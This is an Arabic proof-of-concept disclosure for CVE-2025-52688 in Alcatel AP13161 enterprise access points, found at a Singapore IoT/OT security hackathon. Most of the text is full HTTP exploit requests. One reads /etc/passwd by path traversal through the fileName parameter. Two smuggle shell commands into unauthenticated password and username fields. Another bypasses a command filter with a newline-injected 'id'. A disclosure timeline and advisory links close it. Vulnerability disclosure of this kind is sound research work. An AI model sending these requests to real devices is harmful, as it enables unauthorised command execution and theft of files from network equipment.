
إثباتات مفهوم لاستغلال CVE-2025-52688: ثغرات حقن أوامر غير مصادق عليها وقراءة ملفات عشوائية في نقاط الوصول اللاسلكية للمؤسسات Alcatel AP13161، تم اكتشافها خلال هاكاثون إنترنت الأشياء/التقنيات التشغيلية.
ألكاتل AP13161 - نقطة اتصال WiFi للمؤسسات
هناك ثغرتان رئيسيتان تتم معالجتهما هنا:
; للتسبب في هجوم حقن أوامرfileName مما يسمح بقراءة ملفات عشوائية بشكل غير مصرح به على الخادمتم اكتشاف هذه الثغرة خلال هاكاثون SPIRICYBER-24 لأمن إنترنت الأشياء/التقنيات التشغيلية (IoT/OT) الذي نظمته وكالة الأمن السيبراني في سنغافورة (CSA) وجامعة نانيانغ التكنولوجية (NTU)
يسمح معامل fileName لأي مستخدم غير مصادق بعرض أي ملفات على النظام. من خلال التنقل عبر المجلدات، يمكننا قراءة الملفات الحساسة على الخادم
POST /echo.fcgi HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Linux; U; Android 7.0; en-us; MI 5 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.146 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.0.3
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 110
Connection: keep-alive
{
"id":1,
"jsonrpc":"2.0",
"username":"xxx",
"method":"downloader.cert",
"params":{
"fileName":"/../../etc/passwd"
}
}
معامل password في نقطة الوصول /apiaccess معرض لثغرة حقن أوامر بدون مصادقة تسمح لأي مستخدم غير مصادق بتنفيذ أوامر النظام
POST /apiaccess HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
{
"id":1,
"jsonrpc":"2.0",
"method":"system.getPvc",
"params":{
"username": "Administrator",
"password":";echo pwned1234 > /tmp/test.txt"
}
}
معامل username في نقطة الوصول echo.fcgi معرض لثغرة حقن أوامر بدون مصادقة تسمح لأي مستخدم غير مصادق بتنفيذ أوامر النظام
POST /echo.fcgi HTTP/1.1
Host:
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: application/json, text/plain, */*
{
"id":1,
"jsonrpc":"2.0",
"username":"Administrator",
"method":"user.logout",
"params":{
"username": ";echo pwned > /tmp/test.txt",
"Sessionid":""
}
}
يسمح معامل command للمستخدمين المصادقين بتنفيذ وظائف النظام والملفات التنفيذية لاختبار وظائف عمود الإنارة. ومع ذلك، ونظرًا لعدم كفاية تصفية المدخلات والقائمة السوداء، تمكنا من تجاوز عوامل التصفية لتنفيذ تنفيذ برمجي عن بُعد مصادق يسمح لأي مستخدم مسجّل الدخول بتنفيذ أوامر النظام
POST /echo.fcgi HTTP/1.1
Host: XXXX
Content-Length: 349
Accept: application/json, text/plain, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{
"id":1,
"jsonrpc":"2.0",
"method":"expressmessage.call",
"username":"Administrator",
"session":"XXXXXX",
"topic":"WMA/DC:XXXXXXX",
"params":{
"version":"3.0",
"messageID":1,
"macAddress":"DC:XXXXX",
"option":"update",
"method":"ap_manage.exce_command",
"contents":{
"command":"tech_support_command 9 127.0.0.1\nid"
}
}
}
2024-08-10: تم إرسال التقرير إلى فريق الفرز في هاكاثون SpiritCyber لأمن إنترنت الأشياء
2024-08-20: تم قبول التقرير من قبل فريق الفرز
2025-06-25: قامت CSA SingCert بتعيين CVE-2025-52688
2025-07-14: الإفصاح العام
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-072
https://www.al-enterprise.com/-/media/567414972b57459697030898f92ac043.pdf